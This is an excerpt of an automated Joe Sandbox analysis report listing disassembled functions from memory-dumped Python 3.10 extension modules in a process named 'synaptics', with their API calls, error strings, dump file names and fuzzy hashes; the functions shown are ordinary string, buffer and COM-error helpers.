                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D51F0B0A007019FC710CFA9D881B95B7F4FF0A728F144669EE19D7641EB32E912CB95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,00000000,000000FF,00000000,00000000), ref: 6BF4A432
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 6BF4A47C
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(?,?), ref: 6BF4A4A5
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310(iNzz,?,00000000,00000000,00000000), ref: 6BF4A4B6
                                                                                                                                                                                                              • PyErr_SetObject.PYTHON310(00000000), ref: 6BF4A4C5
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6BF4A4D8
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,6BF5136C,00000000), ref: 6BF4A510
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Buffer cannot be None), ref: 6BF4A541
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(00000000,00000000,00000000), ref: 6BF4A558
                                                                                                                                                                                                              • PyUnicode_FromWideChar.PYTHON310(?,?), ref: 6BF4A588
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6BF4A5A9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharErr_FromSizeUnicode_Wide$Arg_BufferBuffer_BuildDeallocFormatMessageObjectObject_ParseReleaseStringTuple_Value_wsprintf
                                                                                                                                                                                                              • String ID: Buffer cannot be None$COM Error 0x%x$iNzz
                                                                                                                                                                                                              • API String ID: 3082679607-4096351031
                                                                                                                                                                                                              • Opcode ID: 1f22d96c745fbcf4ee1001fb19dc8242c0b75d3089574de819c9ff4b25caa833
                                                                                                                                                                                                              • Instruction ID: 8d7b66892e672bd0fd3c5faadda6bc75737220ca09032ffa2d6f5436d48836aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1f22d96c745fbcf4ee1001fb19dc8242c0b75d3089574de819c9ff4b25caa833
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B4119765242119FEB18EB28CC49B6A7FE8EF15314F40486CF959C3272E338D518CB52
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_AsVoidPtr.PYTHON310(?), ref: 6BF4ACEC
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6BF4AD07
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF4AD15
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,00000000), ref: 6BF4AD2A
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF4AD3D
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF4AD5E
                                                                                                                                                                                                              • PyBuffer_Release.PYTHON310(?), ref: 6BF4AD81
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Buffer cannot be None), ref: 6BF4AD9E
                                                                                                                                                                                                              • PyObject_GetBuffer.PYTHON310(?,?,00000000), ref: 6BF4ADAD
                                                                                                                                                                                                              • PyErr_Clear.PYTHON310 ref: 6BF4ADC9
                                                                                                                                                                                                              • ?PyWinLong_AsVoidPtr@@YAHPAU_object@@PAPAX@Z.PYWINTYPES310(?,?), ref: 6BF4ADD5
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyNumber_Long.PYTHON310(?,?,?,?,6BF4443E,?,?,6BF443B3,?,?), ref: 6BF4AA68
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Occurred.PYTHON310(?), ref: 6BF4AA7D
                                                                                                                                                                                                                • Part of subcall function 6BF4AA60: PyErr_Format.PYTHON310(6C7E9584,Unable to convert %s to pointer-sized value,6BF4F284), ref: 6BF4AA95
                                                                                                                                                                                                              • PyErr_Format.PYTHON310(6C7E9584,WPARAM must be a unicode string, int, or buffer object (got %s),00000000), ref: 6BF4ADF3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • WPARAM must be a unicode string, int, or buffer object (got %s), xrefs: 6BF4ADEC
                                                                                                                                                                                                              • Buffer cannot be None, xrefs: 6BF4AD97
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$ClearFormatFreeLong_Mem_OccurredStringVoid$BufferBuffer_CharLongNumber_Object_Ptr@@ReleaseU_object@@Unicode_Wide
                                                                                                                                                                                                              • String ID: Buffer cannot be None$WPARAM must be a unicode string, int, or buffer object (got %s)
                                                                                                                                                                                                              • API String ID: 3878803943-1854686125
                                                                                                                                                                                                              • Opcode ID: 1970f950c4e09cad1cbdb59341d6ededb030b6d3417a2d8a92f5c0866f093f70
                                                                                                                                                                                                              • Instruction ID: 21d55ece5964a29339e89a0727812ef874e375377f80879aad8070f3893caf26
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1970f950c4e09cad1cbdb59341d6ededb030b6d3417a2d8a92f5c0866f093f70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5231B572A20612DFEB00EF14D944B4ABBE4FF55315F044079F515C7226D339E968CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _PyArg_NoKeywords.PYTHON310(?,?), ref: 6C0A7B3A
                                                                                                                                                                                                              • _PyArg_ParseTuple_SizeT.PYTHON310(?,OOO:COMError,?,?,?), ref: 6C0A7B60
                                                                                                                                                                                                              • PySequence_GetSlice.PYTHON310(?,00000001,?), ref: 6C0A7B77
                                                                                                                                                                                                              • PyObject_SetAttrString.PYTHON310(?,args,00000000), ref: 6C0A7B91
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000), ref: 6C0A7BA3
                                                                                                                                                                                                              • PyObject_SetAttrString.PYTHON310(?,hresult,?), ref: 6C0A7BC2
                                                                                                                                                                                                              • PyObject_SetAttrString.PYTHON310(?,text,?), ref: 6C0A7BD4
                                                                                                                                                                                                              • PyObject_SetAttrString.PYTHON310(?,details,?), ref: 6C0A7BE6
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?), ref: 6C0A7BFD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AttrObject_String$Arg_Dealloc$KeywordsParseSequence_SizeSliceTuple_
                                                                                                                                                                                                              • String ID: OOO:COMError$args$details$hresult$text
                                                                                                                                                                                                              • API String ID: 4238450639-2065934886
                                                                                                                                                                                                              • Opcode ID: d4301426a232f9e927671bf3fa6a519d2726f417d0c35756b84fe0c279eb6bbb
                                                                                                                                                                                                              • Instruction ID: 7449d896da194da17a003a1d0a4b65a8b3b23aad8565c8a948dece945aa50896
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4301426a232f9e927671bf3fa6a519d2726f417d0c35756b84fe0c279eb6bbb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1021E671600209BBDB01DFE99D84FDB77FCAF05228F004624FD29E2546D736D6168BA5
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyLong_FromUnsignedLongLong.PYTHON310(?,?), ref: 6BF4A8E7
                                                                                                                                                                                                              • PyLong_FromUnsignedLongLong.PYTHON310(?,?,OtherTransferCount,00000000), ref: 6BF4A8F8
                                                                                                                                                                                                              • PyLong_FromUnsignedLongLong.PYTHON310(?,?,WriteTransferCount,00000000), ref: 6BF4A909
                                                                                                                                                                                                              • PyLong_FromUnsignedLongLong.PYTHON310(?,?,ReadTransferCount,00000000), ref: 6BF4A91A
                                                                                                                                                                                                              • PyLong_FromUnsignedLongLong.PYTHON310(?,?,OtherOperationCount,00000000), ref: 6BF4A92B
                                                                                                                                                                                                              • PyLong_FromUnsignedLongLong.PYTHON310(?,?,WriteOperationCount,00000000), ref: 6BF4A93B
                                                                                                                                                                                                              • _Py_BuildValue_SizeT.PYTHON310({s:N,s:N,s:N,s:N,s:N,s:N},ReadOperationCount,00000000), ref: 6BF4A94B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Long$FromLong_Unsigned$BuildSizeValue_
                                                                                                                                                                                                              • String ID: OtherOperationCount$OtherTransferCount$ReadOperationCount$ReadTransferCount$WriteOperationCount$WriteTransferCount${s:N,s:N,s:N,s:N,s:N,s:N}
                                                                                                                                                                                                              • API String ID: 3939590852-408589094
                                                                                                                                                                                                              • Opcode ID: 1fc3a816b4ced0cdd6d5f842702f1457ba89335b47750ce9760febbfc1c7a932
                                                                                                                                                                                                              • Instruction ID: f8c3912fbcf9d55e807bd14058becaeb75ebfc706e63149e6e5c1b828abdf674
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fc3a816b4ced0cdd6d5f842702f1457ba89335b47750ce9760febbfc1c7a932
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9501FF77850429BBDA015F55DC01CA6BF29FF286167044221FD9861930F723BA749BF1
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyType_IsSubtype.PYTHON310(?,6C0B56F8), ref: 6C0A4703
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • expected %s instance, got %s, xrefs: 6C0A47DA
                                                                                                                                                                                                              • (%s) , xrefs: 6C0A476B
                                                                                                                                                                                                              • incompatible types, %s instance instead of %s instance, xrefs: 6C0A48C2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: SubtypeType_
                                                                                                                                                                                                              • String ID: (%s) $expected %s instance, got %s$incompatible types, %s instance instead of %s instance
                                                                                                                                                                                                              • API String ID: 2891779845-3177377183
                                                                                                                                                                                                              • Opcode ID: f735b39aa1a5541b5320c89bea57b39ce75772680c5beef7105ae95c1acf2d26
                                                                                                                                                                                                              • Instruction ID: d1489fab657a69e775a59e5e668060e856ad17250a2e931fe95b6dee5fdeda3e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f735b39aa1a5541b5320c89bea57b39ce75772680c5beef7105ae95c1acf2d26
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25514439701141ABCB04CFD5FC80BAEB3E9EF41229B1045A9EC2C97A11DF32D922CB91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyEval_SaveThread.PYTHON310(00000000,?,?), ref: 6C0AA254
                                                                                                                                                                                                              • GetErrorInfo.OLEAUT32(00000000,00000000), ref: 6C0AA298
                                                                                                                                                                                                              • PyEval_RestoreThread.PYTHON310(?), ref: 6C0AA2FB
                                                                                                                                                                                                              • ProgIDFromCLSID.OLE32(?,00000000), ref: 6C0AA313
                                                                                                                                                                                                              • Py_BuildValue.PYTHON310(iu(uuuiu),00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C0AA338
                                                                                                                                                                                                              • PyErr_SetObject.PYTHON310(00000000), ref: 6C0AA34E
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF), ref: 6C0AA35D
                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000), ref: 6C0AA367
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C0AA37B
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C0AA385
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 6C0AA38F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Free$String$Eval_Thread$BuildDeallocErr_ErrorFromInfoLocalObjectProgRestoreSaveValue
                                                                                                                                                                                                              • String ID: `<upj>uP?<u$iu(uuuiu)
                                                                                                                                                                                                              • API String ID: 2817777535-2693397157
                                                                                                                                                                                                              • Opcode ID: 6e0da547e9ef448414137c57941aedd2df8c28e17764ca41bbf93d5af7124588
                                                                                                                                                                                                              • Instruction ID: 765741cf32cd2d93c91d899a8954d9362cbb86e05847516821f213d98b970e15
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e0da547e9ef448414137c57941aedd2df8c28e17764ca41bbf93d5af7124588
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8651C6B1A04209AFDB04DFE8C984EEEB7F9EF49218F104158E515E7251DB36AD06CBA4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyErr_SetString.PYTHON310(6C7E9584,Array does not support item deletion), ref: 6C0A6A0A
                                                                                                                                                                                                              • PyIndex_Check.PYTHON310(?), ref: 6C0A6A21
                                                                                                                                                                                                              • PyNumber_AsSsize_t.PYTHON310(?,6C7EA174), ref: 6C0A6A36
                                                                                                                                                                                                              • PyErr_Occurred.PYTHON310 ref: 6C0A6A49
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • indices must be integer, xrefs: 6C0A6B52
                                                                                                                                                                                                              • Array does not support item deletion, xrefs: 6C0A6A03
                                                                                                                                                                                                              • Can only assign sequence of same size, xrefs: 6C0A6AF1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Err_$CheckIndex_Number_OccurredSsize_tString
                                                                                                                                                                                                              • String ID: Array does not support item deletion$Can only assign sequence of same size$indices must be integer
                                                                                                                                                                                                              • API String ID: 428023279-3643249925
                                                                                                                                                                                                              • Opcode ID: c729c1da254f3050a310d551812a726ae0f99f059b319cb2b770832039d7832f
                                                                                                                                                                                                              • Instruction ID: e2ebac6ee5782a889a014d9163fb62ec20c877e96b2bf0563af9290ad82bb609
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c729c1da254f3050a310d551812a726ae0f99f059b319cb2b770832039d7832f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2241F6B2E04108ABCF00CFDCDD84ADE77F8EF45728B144261EC29E3641EB3299568B95
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyThreadState_Get.PYTHON310 ref: 6C0A3D66
                                                                                                                                                                                                              • _Py_CheckFunctionResult.PYTHON310(00000000,6C0B6110,00000000,00000000), ref: 6C0A3DA0
                                                                                                                                                                                                              • _PyObject_MakeTpCall.PYTHON310(00000000,6C0B6110,00000000,00000000,00000000), ref: 6C0A3DB7
                                                                                                                                                                                                              • PyMem_Malloc.PYTHON310 ref: 6C0A3DD3
                                                                                                                                                                                                              • PyErr_NoMemory.PYTHON310(00000004), ref: 6C0A3DE2
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,00000004), ref: 6C0A3DF9
                                                                                                                                                                                                              • PyDict_Update.PYTHON310(00000000,?,?,?,?,00000004), ref: 6C0A3E51
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000,?,?,?,?,?,00000004), ref: 6C0A3E6A
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(-000000FF,?,?,?,?,?,00000004), ref: 6C0A3E75
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(?,?,?,?,?,?,00000004), ref: 6C0A3E93
                                                                                                                                                                                                              • _Py_Dealloc.PYTHON310(00000000,?,?,?,?,?,00000004), ref: 6C0A3EA9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3096833178.000000006C0A1000.00000020.00000001.01000000.0000001F.sdmp, Offset: 6C0A0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096639269.000000006C0A0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3096945165.000000006C0B0000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097139467.000000006C0B5000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3097249465.000000006C0B7000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6c0a0000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Dealloc$CallCheckDict_Err_FunctionMakeMallocMem_MemoryObject_ResultState_ThreadUpdate
                                                                                                                                                                                                              • String ID: 0bal$X{}
                                                                                                                                                                                                              • API String ID: 2505828500-3425467830
                                                                                                                                                                                                              • Opcode ID: be466b990bea8d55edc85c0bfbc3606bb0089a13232d7fb5f0612fa46547144e
                                                                                                                                                                                                              • Instruction ID: cb78275e61c41884c449b0ab0471b1f1f62bbe736c41dc67744a319145946182
                                                                                                                                                                                                              • Opcode Fuzzy Hash: be466b990bea8d55edc85c0bfbc3606bb0089a13232d7fb5f0612fa46547144e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92412671604601ABDB00CBF4AC4178A73F4FF4673CF140A24EA29E36C2DB36E4168795
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyBytes_Size.PYTHON310 ref: 6BF48D2C
                                                                                                                                                                                                              • PyBytes_AsString.PYTHON310 ref: 6BF48D35
                                                                                                                                                                                                              • CoTaskMemAlloc.OLE32(00000000), ref: 6BF48D4C
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 6BF48D6D
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,?), ref: 6BF48D92
                                                                                                                                                                                                              • CoTaskMemAlloc.OLE32 ref: 6BF48DB8
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?), ref: 6BF48DD0
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF48DE1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF48E49
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF48E1A
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF48E3E, 6BF48E43
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocBytes_CharStringTaskWide$ByteFreeMem_MultiSizeUnicode_memcpy
                                                                                                                                                                                                              • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.
                                                                                                                                                                                                              • API String ID: 2863521918-2588796395
                                                                                                                                                                                                              • Opcode ID: f05753d0cf7fd318f50b96bcb3cedf47adbf37733a49f95399edf7d5eb98ec7a
                                                                                                                                                                                                              • Instruction ID: 1c0e8296504b37babd72463ff04b41ee5d624e9076ca903fa6deaf5e62258b45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f05753d0cf7fd318f50b96bcb3cedf47adbf37733a49f95399edf7d5eb98ec7a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C331A0367112119FDB04EB59EC44BAA7BA8EBD5221F44047AFD04C3222D339DA1DCBB2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PyBytes_Size.PYTHON310(?), ref: 6BF48E9E
                                                                                                                                                                                                              • PyBytes_AsString.PYTHON310(?), ref: 6BF48EA7
                                                                                                                                                                                                              • CoTaskMemAlloc.OLE32(00000000), ref: 6BF48EC7
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 6BF48EE6
                                                                                                                                                                                                              • PyUnicode_AsWideCharString.PYTHON310(?,?), ref: 6BF48F0B
                                                                                                                                                                                                              • CoTaskMemAlloc.OLE32(?), ref: 6BF48F28
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6BF48F3E
                                                                                                                                                                                                              • PyMem_Free.PYTHON310(?), ref: 6BF48F4F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Objects of type '%s' can not be converted to Unicode., xrefs: 6BF48FB7
                                                                                                                                                                                                              • None is not a valid string in this context, xrefs: 6BF48F88
                                                                                                                                                                                                              • <NULL!!>, xrefs: 6BF48FAC, 6BF48FB1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080590143.000000006BF59000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080797218.000000006BF5B000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_24_2_6bf40000_synaptics.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocBytes_CharStringTaskWide$ByteFreeMem_MultiSizeUnicode_memcpy
                                                                                                                                                                                                              • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.
                                                                                                                                                                                                              • API String ID: 2863521918-2588796395
                                                                                                                                                                                                              • Opcode ID: dcf3bc5ff29a40b70a9c53e8e06ec3ea327e7144aaa9a5000e3776a42d07d799
                                                                                                                                                                                                              • Instruction ID: e3ed61b49d9b796a2a0c51ebd2a632d561bc8e27e06f8af3dc85a60659ccd98e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcf3bc5ff29a40b70a9c53e8e06ec3ea327e7144aaa9a5000e3776a42d07d799
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D83192367102109BDB05EB59EC44B9A7BA9EBD5221F440069FD04D3262E73DEA1DCBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsValidSid.ADVAPI32(00000000,?,00000000,00000000,6BF47E9E,00000000), ref: 6BF47D68
                                                                                                                                                                                                              • GetSidIdentifierAuthority.ADVAPI32(00000000,?,?,00000000,00000000,6BF47E9E,00000000), ref: 6BF47D78
                                                                                                                                                                                                              • GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,00000000,00000000,6BF47E9E,00000000), ref: 6BF47D81
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007A,?,?,00000000,00000000,6BF47E9E,00000000), ref: 6BF47DA4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000018.00000002.3080200901.000000006BF41000.00000020.00000001.01000000.00000036.sdmp, Offset: 6BF40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000018.00000002.3079991617.000000006BF40000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000018.00000002.3080303557.000000006BF4E000.00000002.00000001.01000000.00000036.sdmpDownload File
